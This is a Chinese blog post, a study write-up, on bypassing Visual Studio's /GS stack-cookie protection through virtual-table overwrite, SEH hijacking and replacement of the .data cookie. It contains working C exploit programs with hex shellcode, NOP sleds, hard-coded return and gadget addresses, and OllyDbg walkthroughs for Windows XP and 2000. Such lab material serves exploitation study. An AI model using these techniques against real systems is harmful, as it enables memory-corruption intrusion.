<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="googleaf0347feb5ea0936.html" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="windows,GS," />





  <link rel="alternate" href="/atom.xml" title="上善若水" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="1.介绍GSVS设置GS开启：Project-&amp;gt;project Properties-&amp;gt;Configuration Properties-&amp;gt;C/C++-&amp;gt;Code Generation-&amp;gt;Buffer Security Check 1.1 GS工作原理 在所有函数调用发生时，向栈帧中压入额外的随机DWORD，这个随机数被称作&amp;quot;canary&amp;quot;，在ID">
<meta name="keywords" content="windows,GS">
<meta property="og:type" content="article">
<meta property="og:title" content="绕过GS安全编译的方法">
<meta property="og:url" content="http://yoursite.com/2017/07/04/绕过GS安全编译的方法/index.html">
<meta property="og:site_name" content="上善若水">
<meta property="og:description" content="1.介绍GSVS设置GS开启：Project-&amp;gt;project Properties-&amp;gt;Configuration Properties-&amp;gt;C/C++-&amp;gt;Code Generation-&amp;gt;Buffer Security Check 1.1 GS工作原理 在所有函数调用发生时，向栈帧中压入额外的随机DWORD，这个随机数被称作&amp;quot;canary&amp;quot;，在ID">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/gs.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/gs_relocate.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/gs_stack.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/gs_stack2.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/gs_stack3.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/gs_stack4.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/gs_stack5.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-04/rip_gs.jpg">
<meta property="og:updated_time" content="2017-07-07T07:56:52.001Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="绕过GS安全编译的方法">
<meta name="twitter:description" content="1.介绍GSVS设置GS开启：Project-&amp;gt;project Properties-&amp;gt;Configuration Properties-&amp;gt;C/C++-&amp;gt;Code Generation-&amp;gt;Buffer Security Check 1.1 GS工作原理 在所有函数调用发生时，向栈帧中压入额外的随机DWORD，这个随机数被称作&amp;quot;canary&amp;quot;，在ID">
<meta name="twitter:image" content="http://yoursite.com/images/2017-07-04/gs.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.2',
    sidebar: {"position":"right","display":"post","offset":12,"offset_float":12,"b2t":true,"scrollpercent":false,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/07/04/绕过GS安全编译的方法/"/>





  <title>绕过GS安全编译的方法 | 上善若水</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?663212c5ef558c27e77385b620f14823";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">上善若水</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">古之立大事者，不惟有超世之才，亦必有坚韧不拔之志！</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br />
            
            站点地图
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/07/04/绕过GS安全编译的方法/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Introspelliam">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/me.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="上善若水">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">绕过GS安全编译的方法</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-07-04T13:51:38+08:00">
                2017-07-04
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/安全技术/" itemprop="url" rel="index">
                    <span itemprop="name">安全技术</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="1-介绍GS"><a href="#1-介绍GS" class="headerlink" title="1.介绍GS"></a>1.介绍GS</h3><p>VS设置GS开启：Project-&gt;project Properties-&gt;Configuration Properties-&gt;C/C++-&gt;Code Generation-&gt;Buffer Security Check</p>
<h4 id="1-1-GS工作原理"><a href="#1-1-GS工作原理" class="headerlink" title="1.1 GS工作原理"></a>1.1 GS工作原理</h4><ul>
<li>在所有函数调用发生时，向栈帧中压入额外的随机DWORD，这个随机数被称作&quot;canary&quot;，在IDA中被标注为“Security Cookie”。</li>
<li>Security Cookie位于EBP之前，系统还将.data的内存区域中存放一个Security Cookie副本</li>
<li>当栈发生溢出时，Security Cookie将被首先淹没，之后才是EBP和返回地址</li>
<li>在函数返回之前，系统将执行额外的安全验证操作，即Security Check</li>
<li>在Security Check过程中，系统将比较栈中原先存放的Security Cookie和.data中副本的值，如果两者不吻合，说明栈帧中的Security Cookie已被破坏，即栈中已经溢出</li>
<li>当检测处溢出时，系统将进入异常处理流程，函数不会被正常返回，ret指令也不会被执行</li>
</ul>
<p><img src="/images/2017-07-04/gs.jpg" alt="GS内存格局"></p>
<h4 id="1-2-不会使用GS的情况"><a href="#1-2-不会使用GS的情况" class="headerlink" title="1.2 不会使用GS的情况"></a>1.2 不会使用GS的情况</h4><ol>
<li>函数不包括缓冲区</li>
<li>函数被定义为具有变量参数列表</li>
<li>函数使用无保护的关键字标记</li>
<li>函数在第一个语句中包含内嵌汇编代码</li>
<li>缓冲区不是8字节类型且大小不大于4字节</li>
</ol>
<p>当然，也可以使用#pragma strict_gs_check(on)为任意类型的函数添加Security Cookie。</p>
<h4 id="1-3-其他栈保护措施"><a href="#1-3-其他栈保护措施" class="headerlink" title="1.3 其他栈保护措施"></a>1.3 其他栈保护措施</h4><p>VS 2005及后续版本使用了变量重排技术，在编译时根据局部变量的类型对变量在栈帧中的位置进行调整，将字符串变量移动到栈帧的高地址。这样可以防止该字符串溢出时破坏其他的局部变量，同时还会将指针参数的字符串参数复制到内存中的低地址，防止函数参数被破坏。</p>
<p><img src="/images/2017-07-04/gs_relocate.jpg" alt="GS重排技术"></p>
<h4 id="1-4-Security-Cookie生成细节"><a href="#1-4-Security-Cookie生成细节" class="headerlink" title="1.4 Security Cookie生成细节"></a>1.4 Security Cookie生成细节</h4><ul>
<li>系统以.data节的第一个双字作为Cookie的种子，或原始Cookie（所有函数的Cookie都用这个DWORD生成）</li>
<li>在程序每次运行时Cookie的种子都不同，因此种子具有很强的随机性</li>
<li>在栈帧初始化以后系统用ESP异或种子，作为当前函数的Cookie，以此作为不同函数之间的区别，并增加 Cookie的随机性</li>
<li>在函数返回前，用ESP还原出（异或）Cookie的种子</li>
</ul>
<h4 id="1-5-GS优缺点"><a href="#1-5-GS优缺点" class="headerlink" title="1.5 GS优缺点"></a>1.5 GS优缺点</h4><ol>
<li>修改栈帧中函数返回地址的经典攻击将被GS机制有效遏制</li>
<li>基于改写函数指针的攻击，如C++虚函数的攻击，GS机制仍然很难防御</li>
<li>针对异常处理机制的攻击，GS很难防御</li>
<li>GS是对栈帧的保护机制，因此很难防御堆溢出的攻击</li>
</ol>
<h3 id="2-利用未保护的内存突破GS"><a href="#2-利用未保护的内存突破GS" class="headerlink" title="2. 利用未保护的内存突破GS"></a>2. 利用未保护的内存突破GS</h3><p>这其实在前面已经介绍过，当缓冲区不是8字节类型且大小不大于4字节，系统是不会给予GS保护的，这时候就可以使用栈或堆溢出</p>
<h3 id="3-覆盖虚函数突破GS"><a href="#3-覆盖虚函数突破GS" class="headerlink" title="3. 覆盖虚函数突破GS"></a>3. 覆盖虚函数突破GS</h3><h4 id="3-1-测试代码"><a href="#3-1-测试代码" class="headerlink" title="3.1 测试代码"></a>3.1 测试代码</h4><pre><code>
#include "stdafx.h"
#include "string.h"

class GSVirtual{
public:
    void gsv(char *src)
    {
        char buf[200];
        strcpy(buf, src);
        vir();
    }
    virtual void vir()
    {
    }
};

int main()
{
    GSVirtual test;
    test.gsv(
    "\xfc\x5e\x97\x7c\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x9d\x93\x7c"
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    "\xF0\x20\x40\0"
    );
    return 0;
}

</code></pre>

<font color="#f00">说明：shellcode中头部的0x7c992b04为&quot;pop edi, pop esi, retn&quot;指令的地址，不同版本的系统中该地址可能不同</font>


<h4 id="3-2-实验原理"><a href="#3-2-实验原理" class="headerlink" title="3.2 实验原理"></a>3.2 实验原理</h4><p>实验思路：</p>
<ol>
<li>类GSVirtual中的gsv函数存在典型的栈溢出漏洞</li>
<li>类GSVirtual中包含一个虚函数vir</li>
<li>当gsv中的buf变量发生溢出的时候有可能影响虚表指针，如果可以控制虚表指针，将其指向我们可以控制的内存空间，就可以在程序调用时控制程序的流程。</li>
</ol>
<p>实验环境</p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows XP SP3</td>
<td></td>
</tr>
<tr>
<td>编译器</td>
<td>Visual Studio 2008</td>
<td></td>
</tr>
<tr>
<td>编译选项</td>
<td><font color="#f00">禁用优化选项</font></td>
<td></td>
</tr>
<tr>
<td>build版本</td>
<td>release版本</td>
</tr>
</tbody>
</table>
<p>为了能够精准地淹没虚函数表，test.gsv中传入参数&quot;\x90&quot;*199+&quot;\0&quot;，在执行strcpy之后暂停<br>此时栈帧内容为<br><img src="/images/2017-07-04/gs_stack.jpg" alt="传入参数后的栈帧内容"></p>
<p>从栈帧中可以看出，距离虚函数表地址还有20字节的内容。然后考虑一下执行过程，控制虚表指针后，可以<font color="#f00">让程序跳到虚表指针指向的虚表函数地址中去执行（即jmp [虚表指针内容]）</font>。过程如图，程序根据虚表指针找到虚表，然后从虚表中取出调用的虚函数地址，根据这个地址转入虚函数执行。</p>
<p><img src="/images/2017-07-04/gs_stack2.jpg" alt="虚函数执行过程"></p>
<p>变量buff在内存中的位置不是固定的，需要考虑如何让虚表指针刚好指向shellcode的范围内。虽然原始参数为（0x004020F0）是位于虚表（0x004021C0）附近，所以我们直接淹没虚表地址。</p>
<p>虚表指针指向原始参数中的shellcode后，紧跟着一个call操作，也就是说还需要在执行这个call后还必须返回shellcode空间继续执行，这儿有个办法就是直接进入栈空间中的buff内执行shellcode。<br><img src="/images/2017-07-04/gs_stack3.jpg" alt="进入call之后的内存空间"></p>
<p>从图中可以看出，此时Buff的地址存放在0x0012FE9C，位于ESP+4的位置，我们只要执行&quot;pop pop retn&quot;指令序列后就可以转到0x0012FE9C中执行。我们找到了ntdll.dll在0x7C975EFC处的&quot;pop esi, pop edi, retn&quot;指令。</p>
<p>但是在虚函数执行此地址处的函数指令的时候，retn之后会重新跳入栈顶指针0x7C975EFC处继续执行一遍&quot;pop esi, pop edi, retn&quot;指令</p>
<p><img src="/images/2017-07-04/gs_stack4.jpg" alt="第一次执行&quot;pop pop retn&quot;之后"></p>
<p>为了能够让程序执行shellcode中关键内容，我们让这次执行&quot;pop pop retn&quot;后程序进入ntdll.dll中0x7c939db0中执行&quot;push esp, retn&quot;指令<br><img src="/images/2017-07-04/gs_stack5.jpg" alt="第二次执行&quot;pop pop retn&quot;之后"></p>
<p>这时候执行push esp就将shellcode中的地址传入栈中，然后retn后就执行shellcode中内容</p>
<font color="#f00">本次执行的过程与《0day安全》上讲的不一样，总觉得书上这个地方讲错了</font>

<h3 id="4-攻击异常处理突破GS"><a href="#4-攻击异常处理突破GS" class="headerlink" title="4. 攻击异常处理突破GS"></a>4. 攻击异常处理突破GS</h3><h4 id="4-1-测试代码"><a href="#4-1-测试代码" class="headerlink" title="4.1 测试代码"></a>4.1 测试代码</h4><pre><code>
#include "stdafx.h"
#include "string.h"

char shellcode[] = 
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xA0\xFE\x12\x00";


void test(char *input)
{
    char buf[200];
    strcpy(buf, input);
    strcat(buf, input);
}

int main()
{
    test(shellcode);
}
</code></pre>

<h4 id="4-2-实验原理"><a href="#4-2-实验原理" class="headerlink" title="4.2 实验原理"></a>4.2 实验原理</h4><p>实验思路</p>
<ol>
<li>函数test存在典型的栈溢出漏洞</li>
<li>在strcpy操作后变量buf会被溢出，当字符串足够长的时候程序的SEH异常处理句柄会被淹没</li>
<li>由于strcpy溢出，覆盖了input的地址，会造成strcat从一个非法地址读取错误，这会触发异常，程序进入异常处理，这样就可以在程序检查Security Cookie前将程序流程劫持</li>
</ol>
<p>实验环境</p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows 2000 SP4</td>
<td></td>
</tr>
<tr>
<td>编译器</td>
<td>Visual Studio 2005</td>
<td>Windows 2000最高支持VS2005</td>
</tr>
<tr>
<td>编译选项</td>
<td><font color="#f00">禁用优化选项</font></td>
<td></td>
</tr>
<tr>
<td>build版本</td>
<td>release版本</td>
</tr>
</tbody>
</table>
<p>测试步骤</p>
<ol>
<li>首先用&quot;\x90&quot;*199+&quot;\0&quot;作为shellcode，按照实验环境编译，用OllyDbg加载程序，在程序执行strcpy后中断程序<br>执行完之后，发现shellcode起始位置为0x0012FEA0，距离栈顶最近的SEH位于0x0012FFb0+4。于是知道shellcode起始位置到最近的SEH句柄需要276字节。</li>
<li>shellcode: 168字节弹出对话框shellcode + 108*&quot;\x90&quot; + &quot;\xA0\xFE\x12\x00&quot;</li>
</ol>
<h3 id="5-同时替换栈中和-data中的Cookie突破GS"><a href="#5-同时替换栈中和-data中的Cookie突破GS" class="headerlink" title="5. 同时替换栈中和.data中的Cookie突破GS"></a>5. 同时替换栈中和.data中的Cookie突破GS</h3><h4 id="5-1-实验代码"><a href="#5-1-实验代码" class="headerlink" title="5.1 实验代码"></a>5.1 实验代码</h4><pre><code>
#include "stdafx.h"
#include "string.h"
#include "stdlib.h"

char shellcode[] = 
    "\x90\x90\x90\x90"    // new value of cookie in .data
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xF4\x6F\x82\x90"    // result of \x90\x90\x90\x90 xor EIP
    "\x90\x90\x90\x90"
    "\x94\xFE\x12\x00";  // address of shellcode 

void test(char *s, int i, char *src)
{
    char dest[200];
    if(i&lt;0x9995)
    {
        char *buf = s+i;
        *buf = *src;
        *(buf+1) = *(src+1);
        *(buf+2) = *(src+2);
        *(buf+3) = *(src+3);
        strcpy(dest, src);
    }
}
void main()
{
    char *str = (char *)malloc(0x10000);
    test(str, 0xffff3094, shellcode);
}
</code></pre>

<h4 id="5-2-实验原理"><a href="#5-2-实验原理" class="headerlink" title="5.2 实验原理"></a>5.2 实验原理</h4><p>实验思路：</p>
<ol>
<li>main函数在堆中申请了0x10000字节的空间，并通过test函数对其空间的内容尽心操作</li>
<li>test函数对s+i到s+i+3的内存进行赋值，虽然函数对i进行了上限判断，但是没有判断i是否大于0，当i为负值时，s+i所指向的空间就会脱离main中申请的空间，进而有可能会指向.data区域</li>
<li>test函数中的strcpy存在典型的溢出漏洞</li>
</ol>
<p>实验环境</p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows XP SP3</td>
<td></td>
</tr>
<tr>
<td>编译器</td>
<td>Visual Studio 2008</td>
<td></td>
</tr>
<tr>
<td>编译选项</td>
<td><font color="#f00">禁用优化选项</font></td>
<td></td>
</tr>
<tr>
<td>build版本</td>
<td>release版本</td>
</tr>
</tbody>
</table>
<p>Security Cookie校验过程：</p>
<ol>
<li>shellcode赋值为8*&quot;\x90&quot;，然后使用OllyDbg加载 运行程序，并中断在test函数中的if语句处，此实验中该语句地址0x00401013</li>
<li><font color="#f0f">如下图所示，程序从0x0040300C(<strong>security_cookie)处取出Cookie值，然后与EBP做一次异或，最后将异或之后的值放到EBP-4的位置作为次函数的Security Cookie。函数返回前的校验过程就是此过程的逆过程：程序从EBP-4的位置取出值，然后与EBP异或，最后与0x0040300C(</strong>security_cookie)处的Cookie进行比较，如果两者一致则校验通过，否则转入校验失败的异常处理。</font><font color="#0f0">由于__security_cookie会随着实验而进行改变，所以此处可能会改变。在后面的实验中发现，这个地方的值为0x004030DC，所以得读者自己进行测试</font><br><img src="/images/2017-07-04/rip_gs.jpg" alt="Security Cookie生成过程"></li>
<li>实验关键点就是在0x004030DC处写入我们的数据，而我们在main函数中通过malloc申请的空间起始位置是0x00410048<font color="#f00">将程序中断在malloc之后，call MALLOC之后，函数会将申请的空间起始地址保存在EAX并返回</font>。这个位置相对于0x00403000处于高址位置，可以通过向test函数中i参数传递一个负值来将指针str向0x00403000方向移动，通过计算得到i应设置为0xffff3094(-53100)就可以将str指向0x004030DC。</li>
<li>将程序重新编译后，在strcpy处中断。此时0x004030DC被覆盖为0x90909090。将0x90909090与当前EBP异或的结果放到Security Cookie位置即可。此时异或的结果为0x90826FF4。</li>
<li>调试发现dest起始位置为0x0012FE94，Security Cookie位于0x0012FF60，返回地址位于0x0012FF68.</li>
<li>shellcode组成： &quot;\x90\x90\x90\x90&quot;修改.data中Cookie + 168字节弹出对话框 + 32*&quot;\x90&quot; + &quot;\xF4\x6F\x82\x90&quot;Security Cookie + &quot;\x90\x90\x90\x90\x94\xFE\x12\x00&quot; 填充和返回地址覆盖</li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/windows/" rel="tag"># windows</a>
          
            <a href="/tags/GS/" rel="tag"># GS</a>
          
        </div>
      

      
      
        <div class="post-widgets">
        
          <div class="wp_rating">
            <div id="wpac-rating"></div>
          </div>
        

        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/07/03/详解python中xlrd包的安装与处理Excel表格/" rel="next" title="详解python中xlrd包的安装与处理Excel表格">
                <i class="fa fa-chevron-left"></i> 详解python中xlrd包的安装与处理Excel表格
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/07/06/汇编中常见指令解释/" rel="prev" title="汇编中常见指令解释">
                汇编中常见指令解释 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="gitalk-container"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/me.jpg"
               alt="Introspelliam" />
          <p class="site-author-name" itemprop="name">Introspelliam</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">132</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">16</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">55</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
